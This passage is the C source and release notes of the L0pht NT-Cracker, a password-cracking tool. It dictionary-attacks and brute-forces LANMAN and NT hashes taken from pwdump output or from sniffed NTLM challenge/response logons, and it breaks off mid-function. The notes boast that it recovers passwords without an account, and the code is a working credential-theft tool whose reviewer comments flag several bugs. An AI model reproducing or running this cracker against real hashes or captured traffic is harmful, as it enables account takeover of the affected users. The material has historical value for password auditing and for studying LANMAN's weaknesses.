       release. It still does all of the things the first one did PLUS:
    
       . Can now dictionary attack or brute force the network NT server 
         challenge that is used to prevent the OWF from going across the
         wire in its plaintext format. Here's how their setup works:
    
            [assuming initial setup etc...]
    
               8byte "random" challenge
         Client <---------------------- Server
         OWF1 = pad Lanman OWF with 5 nulls
         OWF2 = pad NT OWF with 5 nulls
         resp = E(OWF1, Chal) E(OWF2, Chal)
               48byte response (24byte lanman 24byte nt)
         Client -----------------------> Server
    
         The client takes the OWF ( all 16 bytes of it) and pads with 5 nulls. 
         From this point it des ecb encrypts the, now 21byte, OWF with the
         8byte challenge. The resulting 24byte string is sent over to the
         server who performs the same operations on the OWF stored in its
         registry and compares the resulting two 24byte strings. If they 
         match the user used the correct passwd.
    
         What's cool about this? Well, now you can take your sniffer logs
         of NT logons and retrieve the plaintext passwords. This does not
         require an account on the NT machine nor does it require previous
         knowledge of the ADMINISTRATOR password. 
    
         See, the problem was that of Microsoft's horrible marketing driven 
         patch to prevent pwdump from working. [elaborate on why that sucked]
    
       . Recursion has been removed from both the brute forcing in the Lanman
         case and also in the NT case derivation from the Lanman password.
         The iterative functions, although they don't logically represent
         the problem as well as their recursive predecessors, are much more
         memory friendly.
    
       . The large bruter routine no longer overflows the Pentium L2 cache,
         well it didn't seem to do so bad if you had a 512k L2 cache as opposed
         to a 256k one. This offers a large performance increase in bruting.
    
       . A couple of bugs were fixed.
    
    /* NT-Cracker 03.24.97 mudge@l0pht.com
       This program takes the smbpassword file or the output generated by
       the excellent program pwdump (author name) and dictionary attacks
       the LANMAN One Way Password - 
    
      LANMAN One Way Passwords are created in the following fashion:
    	. The password is first converted to uppercase
    	. If the password is longer than 14 chars (bytes) then it
    		is truncated
    	. If the password is less than 14 chars (bytes) then it is
    		padded with NULL's to 14 bytes.
    	. The padded/truncated password is then split in half and each
    		half is used to generate an odd parity DES key
    	. An 8 byte fixed value is then encrypted with each of the
    		DES keys - these two results are concatenated together
    		to produce a 16byte hash.
    
    	The fixed value that is encrypted by each of the DES keys is the 
    	decryption of the value 0xAAD3B435B51404EE with a key of all zeros.
    
      Todo: add an entire keyspace attack to guarantee 
            we get all of the passwords
      Todo: Roll this into pwdump and add the ability to try to brute 
            force the administrators passwords on remote machines to obtain 
    		full user listings and OWPasswords.
      Todo: GUI for the Windows users - weld's job
      Todo: CLI portable
      Todo: If not bruting - let people know if we couldn't find the passwd in a 
          dictionary and the word is <= 7 chars
    
      Crikey! Now I see where ECB mode is going to kill them in the NT 
      dialect - this should make bruting either one trivial!
    
      BIG KUDOS go out to Hobbit@avian.org for his outstanding work in debunking
      CIFS. Without information provided in his paper this program wouldn't be
      here!
    
      This work is provided by the L0pht - it contains code from the 
      following places:
    		. Plenty of original code
    		. generic routines from the samba code source
    		. md4 routines from RSA
    		. DES routines from Eric Young's libdes
    */
    
    #include "includes.h"
    
    /* Forward declarations.
     *
     * Prototypes written without `extern` are for routines declared for use
     * in this file (several of them are defined further down). The `extern`
     * ones are presumably provided by other translation units of the
     * project - confirm against the build. struct user_struct, uchar and the
     * DES/MD4 types are not declared here; they are expected to come from
     * "includes.h".
     */
    void f2(struct user_struct *Ustruct, char *str);
    extern void fill_user_struct(char *dastring, struct user_struct *da_struct);
    extern void str_to_key(unsigned char *,unsigned char *);
    extern void usage(char *);
    extern void LMword(char *, char *);
    extern char * atob(char *, int);
    extern int htoi(char c);
    int crackntdialect(struct user_struct *Ustruct, char *passwd, int check_case);
    void md4hash(char *passwd, unsigned char *p16, int len);
    extern int PutUniCode(char *dst,char *src);
    void chcase(char *str, int pos);
    void LowerString(char *holder, char *word);
    void printuser(struct user_struct *Ustruct, FILE *file);
    int cracklanman(struct user_struct *Ustruct, char *dict_word, char *tmphash);
    extern int isvalid_userline(char *user_entry);
    /* linked list of account records: construction, filtering, teardown */
    extern struct user_struct * init_linked_list();
    extern void add_list_struct(struct user_struct *, char *);
    extern struct user_struct * remove_from_list(struct user_struct *);
    extern struct user_struct * rewind_list(struct user_struct *);
    extern void print_and_prune(struct user_struct *record, FILE *outlist);
    extern void build_linked_list(struct user_struct *head, FILE *pwlist);
    extern struct user_struct * filter_disabled(struct user_struct *head, FILE *outlist);
    extern struct user_struct * filter_nopasswd(struct user_struct *head, FILE *outlist);
    extern struct user_struct * setup_linked_list(int, FILE *, FILE *);
    /* per-word checks called from main's dictionary loop */
    int Lanman(struct user_struct *index, char *dict_word, FILE *outlist);
    int nt(struct user_struct *index, char *dict_word, FILE *outlist);
    int Lanman_and_nt(struct user_struct *index, char *dict_word, FILE *outlist);
    extern void free_struct_list(struct user_struct *);
    /* keyspace search and challenge/response (sniffer log) checks */
    int brute_lanman(struct user_struct *Ustruct, FILE *outlist);
    void half_lanman(char *, char *);
    int brute_routine(struct user_struct *head, char *half_hash, char *, int iter);
    int lm_check_sniff(struct user_struct *, char *);
    int nt_check_sniff(struct user_struct *, char *);
    extern void nt_ify_list(struct user_struct *head);
    extern void print_hits(struct user_struct *head, FILE *outlist);
    extern struct user_struct * prune_list(struct user_struct *head);
    extern void E_P24(uchar *, uchar *, uchar *);
    int issame(char *, char *, int);
    
    
    /* Global str_to_crypt - the 8 byte block that is encrypted with each of
       the odd parity DES keys for LANMAN. The bytes below are the ASCII
       text "KGS!@#$%". According to the original author it is derived by
       decrypting the fixed byte quantity 0xAAD3B435B51404EE with a key
       of all 0's ie:
       	
    	fixed_key[] = "\xAA\xD3\xB4\x35\xB5\x14\x04\xEE";
    	memset(deskey3, '\0', sizeof(deskey3)); - key of all 0's
    	des_set_key((des_cblock *)deskey3, ks3); 
    	des_ecb_encrypt((des_cblock *)fixed_key,
      	    (des_cblock *)str_to_crypt, ks3, DES_DECRYPT);

       Because the block is a constant and no per-account value is mixed in,
       equal passwords always give equal LANMAN hashes; the routines below
       rely on that when they copy one result to every record with the same
       hash. The array is initialised from a string literal, so it holds the
       8 data bytes plus a terminating NUL.
    */
    
    char str_to_crypt[] = "\x4b\x47\x53\x21\x40\x23\x24\x25";
    
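    /*
     * Program entry point: parses the command line, opens the hash list, the
     * optional dictionary and the optional output file, builds the linked
     * list of account records and then runs either the keyspace search or one
     * dictionary pass per word over that list.
     *
     * Options, as parsed below:
     *   -p file   hash list in pwdump format
     *   -P file   hash list taken from sniffer logs (challenge/response)
     *   -w file   dictionary of candidate words
     *   -o file   output file (stdout when not given)
     *   -l        LANMAN check only
     *   -n        NT dialect check only
     *   -b        search the keyspace instead of using a dictionary
     *
     * Exactly one of -p/-P and exactly one of -w/-b must be given, and -l and
     * -n exclude each other.
     *
     * The path and stream variables start out as NULL and every rejected
     * combination ends in exit(1), so an unset path can never reach fopen()
     * even if usage() (defined elsewhere) were to return. The hash list is
     * closed on every normal exit path, not only for -p input.
     *
     * Results written to the output stream contain recovered plaintext
     * passwords, so the output file should be protected accordingly.
     */
    void main(int argc, char **argv) {
    	FILE *pwlist = NULL, *wordlist = NULL, *outlist = NULL;
    	char dict_word[MAX_WORD];
    	char *pwfile = NULL, *wordfile = NULL, *outfile = NULL;
    	struct user_struct *head, *index;
    	extern char *optarg;
    	int c, pcount=0, Pcount=0, wcount=0, ocount=0, brute=0;
    	int lanonly=0, ntonly=0;
    	int ret=0;
    
    	/* getopt() reports the end of the options with -1 */
    	while ( (c = getopt(argc, argv, "p:P:w:blno:")) != -1){
    		switch(c) {
    		case 'p': /* passwd file from pwdump */
    			pwfile = optarg;
    			pcount++;
    			break;
    		case 'P': /* passwd file from sniffer logs - Pcount / pcount
    			     tell us later which format pwfile holds */
    			pwfile = optarg;
    			Pcount++;
    			break;
    		case 'w': /* dictionary of words */
    			wordfile = optarg;
    			wcount++;
    			break;
    		case 'o': /* output file */
    			outfile = optarg;
    			ocount++;
    			break;
    		case 'l': /* LANMAN password ONLY */
    			lanonly++;
    			break;
    		case 'n': /* NT Dialect only */
    			ntonly++;
    			break;
    		case 'b': /* search the keyspace */
    			brute++;
    			break;
    		default:
    			usage(argv[0]);
    			break;
    		}
    	}
    
    	if ((pcount == 0 && Pcount == 0) || (pcount > 0 && Pcount > 0) ||
    	    (wcount == 0 && brute == 0) || (wcount > 0 && brute > 0) ||
    	    (lanonly > 0 && ntonly > 0)) {
    		usage(argv[0]);
    		exit(1); /* only reached if usage() returns */
    	}
    
    	if ((pwlist = fopen(pwfile, "r")) == NULL){ 
    		fprintf(stderr, "Error: could not open %s\n", pwfile);
    		exit(1);
    	}
    
    	if (wcount > 0 ) {
    		if ((wordlist = fopen(wordfile, "r")) == NULL){
    			fprintf(stderr, "Error: could not open %s\n", wordfile);
    			exit(1);
    		}
    	}
    	
    	if (ocount > 0){
    		if ((outlist = fopen(outfile, "w")) == NULL){
    			fprintf(stderr, "Error: could not open %s\n", outfile);
    			exit(1);
    		}
    	} else
    		outlist = stdout;
    
    	/* pcount is 1 for a regular pwdump file and 0 for a sniffer log
    	   with the challenge response */
    	head = setup_linked_list(pcount, pwlist, outlist);
    
    	head = rewind_list(head);
    	index = head;
    
    	if (head == NULL){
    		fprintf(stderr, "Nothing to do so I guess I'm done\n");
    		exit(1);
    	}
    
    	if (brute){
    		ret = brute_lanman(index, outlist);
    	}else{
    		/* fgets() is bounded by MAX_WORD, the size of dict_word */
    		while (fgets(dict_word, MAX_WORD, wordlist) != NULL) {
    
    			/* start every word at the front of whatever is
    			   left of the list */
    			head = rewind_list(index);
    			index = head;
    			
    			if (head == NULL){
    				fprintf(stderr, "Done\n");
    				exit(1);
    			}
    
    			/* visit every record; index is left on the last
    			   one so that rewind_list() can start from it */
    			for (;;){
    				if (lanonly){
    					Lanman(index, dict_word, outlist);
    				} else if (ntonly) {
    					nt(index, dict_word, outlist);
    				} else {
    					Lanman_and_nt(index, dict_word, outlist);
    				}
    				if (index->next == NULL)
    					break;
    				index = index->next;
    			} 
    		}
    	}
    
    	if (ret == 0){ /* if ret is > 0 then we have already pruned ALL
    	                  of the structs in the list...  */
    		head = rewind_list(index);
    		free_struct_list(head);
    	}
    	if (ocount > 0)
    		fclose(outlist);
    	if (wcount > 0)
    		fclose(wordlist);
    	fclose(pwlist);
    }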
    
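    /* Checks one dictionary word against the LANMAN value of one record.
     *
     *   Ustruct   - record under test; pwdumpval selects pwdump mode (stored
     *               hash in lmhashb) or sniffer mode (lm_check_sniff)
     *   dict_word - candidate word, normalised by LMword() first
     *   fullhash  - out: the 16 byte LANMAN hash of the candidate; written
     *               in pwdump mode only
     *
     * Returns 1 on a match and 0 otherwise. On a pwdump match the normalised
     * word is stored in Ustruct->lmpasswd.
     *
     * The two 7 byte halves of the word are hashed independently with the
     * constant block str_to_crypt; this is the structural weakness of the
     * LANMAN format and the reason it should not be stored or accepted on
     * systems that can avoid it.
     */
    int cracklanman(struct user_struct *Ustruct, char *dict_word, char *fullhash){
      /* 14 password bytes plus one byte that stays '\0', so the buffer is a
         valid C string when it is handed to strncpy() or lm_check_sniff() */
      unsigned char passwd[14 + 1];
      unsigned char lanman[16];
      des_cblock deskey1, deskey2;
      des_key_schedule ks1, ks2;
    
      memset(passwd, '\0', sizeof(passwd));
      memset(lanman, '\0', sizeof(lanman));
    
      LMword((char *)passwd, dict_word); /* uppercases and 
                                            truncs/concats word into passwd */
    
      /* sniffer logs: the challenge/response check is done elsewhere */
      if (!Ustruct->pwdumpval)
        return (lm_check_sniff(Ustruct, (char *)passwd) == 1) ? 1 : 0;
    
      /* first half: bytes 0..6 become an 8 byte odd parity DES key */
      str_to_key(passwd, deskey1);
      des_set_key((des_cblock *)deskey1,ks1);
      des_ecb_encrypt((des_cblock *)str_to_crypt,
                      (des_cblock *)lanman, ks1, DES_ENCRYPT);
    
      /* second half: bytes 7..13 */
      str_to_key(&(passwd[7]), deskey2);
      des_set_key((des_cblock *)deskey2,ks2);
      des_ecb_encrypt((des_cblock *)str_to_crypt,
                      (des_cblock *)&lanman[8], ks2, DES_ENCRYPT);
    
      /* The hash is binary and may contain zero bytes. strncpy() would stop
         at the first one and zero-fill the rest, so callers that memcmp()
         all 16 bytes need a plain byte copy. */
      memcpy(fullhash, lanman, sizeof(lanman));
    
      if (memcmp(Ustruct->lmhashb, lanman, sizeof(lanman)) == 0){
        /* NOTE(review): strncpy() does not terminate the destination when
           the source fills LMPASSWDLEN bytes - confirm lmpasswd has room
           for a terminator. */
        strncpy(Ustruct->lmpasswd, (const char *)passwd, LMPASSWDLEN);
        return(1);
      }
      return(0);
    }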
    
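    /* Checks a candidate against the MD4 based NT dialect value of a record.
     *
     *   Ustruct    - record under test
     *   passwd     - candidate word; a trailing '\n' is stripped in place
     *                when check_case is 0
     *   check_case - non-zero: try every upper/lower case variant through
     *                f2(); zero: try the word exactly as received
     *
     * Returns 1 and sets Ustruct->ntdone when Ustruct->ntpasswd is non-empty
     * afterwards, 0 otherwise.
     *
     * An empty candidate no longer indexes passwd[-1] while looking for the
     * newline, and the 16 byte digest lives on the stack as it does in f2().
     */
    int crackntdialect(struct user_struct *Ustruct, char *passwd, int check_case){
    	
      char ntpasswd[129]; 
      unsigned char p16[16];
      char *hold;
      size_t plen;
      int uni_len;
    
      memset(ntpasswd, '\0', sizeof(ntpasswd));
    
      if (check_case){ /* go through the possible case sensitive perms */
        LowerString(ntpasswd, passwd);
        f2(Ustruct, ntpasswd);
      }else{ /* not interested in case sensitivity - just try the dict word as
                we have it */
    
        /* strip the \n - LowerString does this for the case sensitive
           check */
        plen = strlen(passwd);
        if (plen > 0 && passwd[plen - 1] == '\n')
          passwd[plen - 1] = '\0';
    
        /* NOTE(review): hold has NTPASSWDLEN * 2 bytes but the length of
           passwd is not checked against NTPASSWDLEN here - confirm that
           PutUniCode() bounds its output. */
        hold = (char *)malloc(NTPASSWDLEN * 2); /* grab space for 
                                                   unicode */
        if (hold == NULL){
          fprintf(stderr, "out of memory...crackntdialog hold\n");
          exit(1);
        }
    
        uni_len = PutUniCode(hold, passwd); /* convert to unicode; the return
                                               value is used as the length
                                               given to md4hash */
    
        md4hash(hold, p16, uni_len);
        if (Ustruct->pwdumpval){
          if (memcmp(p16, &Ustruct->nthashb, 16) == 0)
            strncpy(Ustruct->ntpasswd, passwd, NTPASSWDLEN);
        } else if (nt_check_sniff(Ustruct, (char *)p16) == 1){
          strncpy(Ustruct->ntpasswd, passwd, NTPASSWDLEN);
        }
        free(hold);
      }
    
      if (strlen(Ustruct->ntpasswd) > 0){
        Ustruct->ntdone = 1;
        return(1);
      }
      return(0);
    }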
    
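    /* Tries every upper/lower case variant of str against the NT dialect
     * value of a record. Despite the wording of the original comment the
     * routine is iterative: bit j of the counter decides whether character j
     * is uppercased, so there are 2 to the power of strlen(str) variants.
     *
     *   Ustruct - record under test; on a match the variant is stored in
     *             Ustruct->ntpasswd
     *   str     - candidate, expected in lower case
     *
     * Candidates that do not fit the local buffer (tmp needs strlen + 1
     * bytes) or whose length reaches the bit width of the counter are
     * skipped. The original copied them with an unbounded strcpy() and
     * shifted an int by the full length, both undefined for long input.
     */
    void f2(struct user_struct *Ustruct, char *str){
      unsigned long i, iters;
      size_t j, len;
      char tmp[128], hold[256]; 
      unsigned char p16[16]; 
      int uni_len;
    
      len = strlen(str);
    
      if (len >= sizeof(tmp) || len >= sizeof(unsigned long) * 8)
        return;
    
      iters = 1UL << len;
    
    #ifdef _DEBUG
      printf("str: %s - len: %d\n", str, (int)len);
      fflush(NULL);
    #endif
    
      for (i=0; i<iters; i++) {   
        strcpy(tmp, str); /* bounded by the length check above */
        /* Set case for this round  */
        for (j=0; j<len; j++) { 
          if (i & (1UL << j)) {
            /* ctype functions need an unsigned char value */
            tmp[j] = (char)toupper((unsigned char)tmp[j]);
          } 
        } 
    #ifdef _DEBUG 
        printf("%lu: %p %s \n", i, (void *)tmp, tmp);
        fflush(NULL); 
    #endif  
        uni_len = PutUniCode(hold, tmp);
    
        md4hash(hold, p16, uni_len);
        if (Ustruct->pwdumpval){  /* we're dealing with pwdump */
          if (memcmp(p16, Ustruct->nthashb, 16) == 0){ 
            strncpy(Ustruct->ntpasswd, tmp, NTPASSWDLEN);
            return;
          }
        } else {  /* we're dealing with sniffer logs */
          if (nt_check_sniff(Ustruct, (char *)p16) == 1){
            strncpy(Ustruct->ntpasswd, tmp, NTPASSWDLEN);
            return;
          }
        }
      }
    }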
    
    /* 
     * Computes the MD4 digest of a password already converted to NT UNICODE.
     *
     *   passwd - input bytes
     *   p16    - out: receives the first 16 bytes of the MD state buffer
     *   len    - input length as returned by PutUniCode()
     *
     * Full 64 byte steps are passed to MDupdate() with a count of 512, the
     * remainder with (len - offset) * 8.
     *
     * NOTE(review): the read position advances by offset / 2 on an
     * unsigned char pointer, i.e. by 32 bytes for every 64 counted. That
     * looks like it was written for a 16 bit element pointer - verify for
     * inputs of 64 bytes or more.
     */
    void md4hash(char *passwd, unsigned char *p16, int len)
    {
    	MDstruct ctx;
    	int off = 0;
      
    	MDbegin(&ctx);
    
    	/* whole blocks first */
    	while (off + 64 <= len){
    		MDupdate(&ctx, (unsigned char *)passwd + (off/2), 512);
    #ifdef BIGENDIAN
    		MDreverse(ctx.buffer);
    #endif
    		off += 64;
    	}
    
    	/* then whatever is left, which may be nothing */
    	MDupdate(&ctx, (unsigned char *)passwd + (off/2), (len-off)*8);
    #ifdef BIGENDIAN
    	MDreverse(ctx.buffer);
    #endif
    
    	memcpy(p16, (unsigned char *)ctx.buffer, 16);
    }
    
    
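    /* Copies word into holder in lower case and drops one trailing '\n'.
     *
     *   holder - destination; must have room for 129 bytes (128 characters
     *            plus the terminator)
     *   word   - source; truncated in place to 128 characters when longer
     *
     * The length is taken after the truncation, so no more than 128
     * characters are ever written (the original measured it before and
     * could run past holder). holder is always terminated, an empty word no
     * longer reads holder[-1], and characters go through unsigned char
     * before they reach the ctype functions.
     */
    void LowerString(char *holder, char *word){
    	size_t i;
    	size_t word_len;
     
    	if (strlen(word) > 128)
    		word[128] = '\0';
    
    	word_len = strlen(word);
    
    	for (i=0; i < word_len; i++)
    		holder[i] = (char)tolower((unsigned char)word[i]);
    	holder[word_len] = '\0';
    
    	if (word_len > 0 && holder[word_len - 1] == '\n')
    		holder[word_len - 1] = '\0';
    
    }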
    
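    /* Uppercases the single character str[pos] in place. The value is
       passed to toupper() as unsigned char, because a negative plain char
       is outside the range the ctype functions accept. */
    void chcase(char *str, int pos){
    	str[pos] = (char)toupper((unsigned char)str[pos]);
    }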
    
    /* Writes one result line for a record and marks it as printed, so every
       record is reported at most once. The line carries the user name and
       both recovered passwords in plaintext; whatever receives this stream
       holds credentials and should be protected accordingly. */
    void printuser(struct user_struct *Ustruct, FILE *file){
      if (Ustruct->already_printed != 1) {
        fprintf(file, "User: [%s] Lanman PW: [%s] NT dialect PW: [%s]\n",
                Ustruct->username, Ustruct->lmpasswd, Ustruct->ntpasswd);
        Ustruct->already_printed = 1;
        fflush(file);
      }
    }
    
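    /* LANMAN-only check of one dictionary word against one record.
     *
     *   index     - record under test
     *   dict_word - candidate word
     *   outlist   - stream for results
     *
     * Returns 1 when the record was already done or matches this word,
     * 0 otherwise. In pwdump mode every later record whose binary hash
     * equals the hash of the candidate is filled in as well; that works
     * because LANMAN hashes carry no per-account value.
     *
     * The scratch buffer holds 15 bytes and is zeroed before each use. The
     * original 14 byte buffer received a strcpy() of a password that can be
     * 14 characters long, and was later read as a C string after LMword().
     * The copies of index->lmpasswd and index->lmhash the original made were
     * never read and are gone.
     */
    int Lanman(struct user_struct *index, char *dict_word, FILE *outlist){
    
      struct user_struct *foo;
      char match_lmpasswd[15];
      char tmphash[16];
      int ret=0;
    
      if (index->lmdone == 1){
        printuser(index, outlist);
        return(1);
      }
    
      memset(match_lmpasswd, '\0', sizeof(match_lmpasswd));
    
      if (index->pwdumpval){ /* doing the pwdump file */
        /* cracklanman fills tmphash with the hash of dict_word */
        if (cracklanman(index, dict_word, tmphash) == 1){
          printuser(index, outlist);
          index->lmdone = 1;
          ret = 1;
        }
        for (foo = index->next; foo != NULL; foo = foo->next){
          if (memcmp(foo->lmhashb, tmphash, 16) == 0){
            /* presumably LMword() writes at most 14 bytes (cracklanman
               hands it a buffer sized for that), which leaves the last
               byte as terminator - confirm */
            memset(match_lmpasswd, '\0', sizeof(match_lmpasswd));
            LMword(match_lmpasswd, dict_word);
            strcpy(foo->lmpasswd, match_lmpasswd);
            foo->lmdone = 1;
          }
        }
      } else { /* doing the sniffer logs */ 
        LMword(match_lmpasswd, dict_word);
        if (lm_check_sniff(index, match_lmpasswd) == 1){
          printuser(index, outlist);
          index->lmdone = 1;
          ret = 1;
        }
      }
      return(ret);
    }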
    
    /* NT-dialect-only check of one dictionary word against one record.
     *
     *   index     - record under test
     *   dict_word - candidate word, tried in every case variant
     *   outlist   - stream for results
     *
     * Returns 1 when the record was already done or matches this word,
     * 0 otherwise. In pwdump mode a match is copied to every later record
     * that carries the same 32 byte nthash field.
     */
    int nt(struct user_struct *index, char *dict_word, FILE *outlist){
      struct user_struct *peer;
      char match_ntpasswd[129], match_nthash[32];
    	
      /* nothing left to do for this record */
      if (index->ntdone == 1){
        printuser(index, outlist);
        return(1);
      }
    
      if (crackntdialect(index, dict_word, 1) != 1)
        return(0);
    
      printuser(index, outlist);
      index->ntdone = 1;
    
      if (index->pwdumpval){
        strcpy(match_ntpasswd, index->ntpasswd);
        memcpy(match_nthash, index->nthash, 32);
    
        /* equal hash means equal password, so share the result */
        for (peer = index->next; peer != NULL; peer = peer->next){
          if (memcmp(peer->nthash, match_nthash, 32) == 0){
            strcpy(peer->ntpasswd, match_ntpasswd);
            peer->ntdone = 1;
          }
        }
      }
      return(1);
    }
    
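    /* Combined check: LANMAN first, then the NT dialect password derived
     * from the LANMAN result.
     *
     *   index     - record under test
     *   dict_word - candidate word
     *   outlist   - stream for results
     *
     * Returns 1 when the record was already complete or its LANMAN value
     * matches this word, 0 otherwise. In pwdump mode every later record
     * whose binary LANMAN hash equals the hash of the candidate is filled
     * in and run through the NT dialect check too.
     *
     * The scratch buffer is zeroed before each use. The original left it
     * uninitialised when the first record did not match, and then read it
     * as a C string after LMword(). The copies of index->lmpasswd and
     * index->lmhash the original made were never read and are gone.
     */
    int Lanman_and_nt(struct user_struct *index, char *dict_word, FILE *outlist){
    
      struct user_struct *foo;
      char match_lmpasswd[15];
      char tmphash[16];
      int ret=0;
    
      if (index->lmdone == 1 && index->ntdone){
        printuser(index, outlist);
        return(1);
      }
    
      if (cracklanman(index, dict_word, tmphash) == 1){
        index->lmdone = 1;
        /* the LANMAN result is upper case; the NT check walks the case
           variants of it */
        if (crackntdialect(index, index->lmpasswd, 1) == 1)
          index->ntdone = 1;
        ret = 1;
        /* lmdone was just set, so the record is always reported here */
        printuser(index, outlist);
      }		
    
      /* tmphash is only written by cracklanman in pwdump mode, which is the
         only mode that reads it */
      if (index->pwdumpval){
        for (foo = index->next; foo != NULL; foo = foo->next){
          if (memcmp(foo->lmhashb, tmphash, 16) == 0){
            /* presumably LMword() writes at most 14 bytes, which leaves
               the last byte as terminator - confirm */
            memset(match_lmpasswd, '\0', sizeof(match_lmpasswd));
            LMword(match_lmpasswd, dict_word);
            strcpy(foo->lmpasswd, match_lmpasswd);
            foo->lmdone = 1;
            crackntdialect(foo, foo->lmpasswd, 1);
          }
        }
      }
      return(ret);
    }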
    
    /*
     * Exhaustive search over candidates of 1..7 characters drawn from
     * all_chars (upper-case A-Z only), tested against the whole list.
     *
     * head    - first entry of the list of accounts still open
     * outlist - stream passed on to print_hits()
     *
     * Returns 1 as soon as prune_list() reports an empty list, 0 when the
     * candidate space is exhausted with entries remaining.
     *
     * Each candidate is turned into one 8-byte value by half_lanman() and
     * that single value is compared against every entry by brute_routine();
     * nothing account-specific enters the computation, so the cost per
     * candidate does not grow with the number of hashes being audited.
     */
    int brute_lanman(struct user_struct *head, FILE *outlist){
      char brute_str[7];            /* zeroed below, otherwise unused */
      char all_chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
      char half_hash[8];
      char tmp[128];                /* current candidate, NUL-terminated by the memset below */
      int spacelen = strlen(all_chars);
      int pwlen = 7;                /* maximum candidate length */
      char *tmpspace[7+1];          /* one cursor into all_chars per position, plus a sentinel */
      struct user_struct *index;
      int i;
      int size;                     /* assigned below, otherwise unused */
    
      size = strlen(all_chars);
    
      index = head;
    
      memset(brute_str, '\0', sizeof(brute_str));
    
      memset(tmp, '\0', sizeof(tmp));
    
      /* initialize the pointers */
      /* position 0 starts at 'A'; a null cursor means "position not in use yet" */
      tmpspace[0]=&all_chars[0];
      for (i=1; i<=pwlen; i++) {
         tmpspace[i]=0;
      }
    
    
      /* ok here we go, go until that extra pointer gets
         changed... */
      /* tmpspace[pwlen] is the sentinel: it is set only when the carry runs
         out of the last real position, i.e. after the final 7-char candidate */
      while(!tmpspace[pwlen]) {
         /* materialise the candidate: one character per active cursor */
         for (i=0; i<=pwlen; i++) {
            if(tmpspace[i] != 0) {
               tmp[i]=*tmpspace[i];
            } else 
              break;
          /* {
               tmp[i]='\0';
              }
           */
         }
    
      /* printf("%s : %d\n", tmp, strlen(tmp));  */
    
         if (index->pwdumpval){
           /* stored-hash input: compare the 8-byte half hash against the list */
           half_lanman(half_hash, tmp);
           if (brute_routine(index, half_hash, tmp, 7) == 1){
    /* NOTE(review): iter is not declared in this function; this branch only
       builds with _DEBUG if iter exists at file scope - confirm */
    #ifdef _DEBUG
             printf("gotone in round %d\n", iter);
             fflush(NULL);
    #endif
             nt_ify_list(index);
             print_hits(index, outlist);
             /* continue with whatever prune_list() leaves; stop when nothing is left */
             head = prune_list(index);
             if (!head)
               return(1);
             else
               index = head;
           }
         } else {
           /* captured challenge/response input: checked by lm_check_sniff() */
           if (lm_check_sniff(index, tmp) == 1){
             nt_ify_list(index);
             print_hits(index, outlist);
             head = prune_list(index);
             if (!head)
               return(1);
             else
               index = head;
            }     
         }
    
         /* increment */
         tmpspace[0]++;
    
         /* carry ? */
         /* position 0 varies fastest; a cursor that ran past 'Z' wraps to 'A'
            and advances (or activates) the next position */
         for (i=0; i<pwlen; i++) {
           if (tmpspace[i] > &all_chars[spacelen -1]) {
             tmpspace[i] = &all_chars[0];
    
         /*
            can't just inc the pointer but
            this could be removed by playing
            games with the data struct... ;-)
         */
             if (tmpspace[i+1] !=0) {
               tmpspace[i+1]++;
             } else {
               tmpspace[i+1] = &all_chars[0];
             } 
          }
        }
      }
    
      return(0);
    }
    
    /*
     * Compute one 8-byte LANMAN half hash.
     *
     * half_hash - output, receives exactly 8 bytes
     * brute_str - candidate string; str_to_key() turns it into a DES key
     *
     * The candidate is used as the DES key and the fixed block str_to_crypt
     * (defined elsewhere in the file) is the plaintext.  No per-account
     * input is involved.
     */
    void half_lanman(char *half_hash, char *brute_str){
      des_key_schedule sched;
      des_cblock key;
      unsigned char digest[8];

      /* candidate -> odd-parity DES key -> key schedule */
      str_to_key((unsigned char *)brute_str, key);
      des_set_key((des_cblock *)key, sched);

      /* encrypt the known constant block under that key */
      des_ecb_encrypt((des_cblock *)str_to_crypt, (des_cblock *)digest,
                      sched, DES_ENCRYPT);

      memcpy(half_hash, digest, sizeof(digest));
    }
    
    /*
     * routine to check the LANMAN passwd
     *
     * Computes the 16-byte LANMAN hash of dict_word: the word is copied into
     * a zero-filled 14-byte buffer, bytes 0..6 and 7..13 each become a DES
     * key, and the fixed block str_to_crypt is encrypted under each key.
     *
     * fullhash  - output buffer, 16 bytes are written
     * dict_word - candidate word; only its first 14 characters are used
     *
     * The two halves are computed independently of each other, which is
     * what lets brute_routine() test them separately.
     */
    void full_lanman(char *fullhash, char *dict_word){
      unsigned char passwd[14];
      unsigned char lanman[16];
      des_cblock deskey1, deskey2;
      des_key_schedule ks1, ks2;
    
      memset(passwd, '\0', sizeof(passwd));
      memset(lanman, '\0', sizeof(lanman));
    
      /* at most 14 characters; shorter words stay zero-padded */
      strncpy(passwd, dict_word, 14);
    
      str_to_key(passwd, deskey1);  /* create the first 8byte odd 
                                       parity des key */
      des_set_key((des_cblock *)deskey1,ks1); /* setup the key schedule */
    
      des_ecb_encrypt((des_cblock *)str_to_crypt, /* encrypt the known 
                                                     8byte value */
                  (des_cblock *)lanman, ks1, DES_ENCRYPT); /* against the 
                                                       first des key */
    
      /* second half: characters 7..13 of the padded word */
      str_to_key(&(passwd[7]), deskey2);
      des_set_key((des_cblock *)deskey2,ks2);
    
      des_ecb_encrypt((des_cblock *)str_to_crypt,\
                                  (des_cblock *)&lanman[8], ks2, DES_ENCRYPT);
    
      /* NOTE(review): lanman is binary data, but strncpy() treats it as a C
         string - copying stops at the first zero byte and the remainder of
         the 16 output bytes is zero-filled */
      strncpy(fullhash, (const char *)lanman, sizeof(lanman));
    
    }
    
    /*
     * Compare one 8-byte half hash against every entry of the list.
     *
     * head      - first list entry
     * half_hash - 8-byte value produced by half_lanman() for brute_str
     * brute_str - the candidate that produced half_hash
     * iter      - the first-half comparison for non-under7 entries is only
     *             made when this is 7
     *
     * Returns 1 if at least one entry became complete (lmdone set) during
     * this call, else 0.
     *
     * Entries flagged under7 need only the first 8 hash bytes to match.
     * For the others the first and second 8 bytes of lmhashb are matched
     * independently and the password is assembled once both halves are
     * known - the two halves never have to be guessed together.
     */
    int brute_routine(struct user_struct *head, char *half_hash, char *brute_str, int iter){
      struct user_struct *index;
      int positive=0;
    
      index = head;
    
      while (index != NULL){
    	  
        if (index->under7){
    	/* short password: a single half decides */
    	if (memcmp(index->lmhashb, half_hash, 8) == 0){
     		strncpy(index->first_half, brute_str, 7);
    		strncpy(index->lmpasswd, brute_str, 7);
    		index->lmdone = 1;
    		positive = 1;
    	}
      }else{
    	  if (iter == 7){
    		  /* first half still unknown? (empty string) */
    		  if (strlen(index->first_half) == 0){
    			if (memcmp(index->lmhashb, half_hash, 8) == 0){
    				strncpy(index->first_half, brute_str, 7);
    				if (strlen(index->second_half) != 0){
    					positive=1;
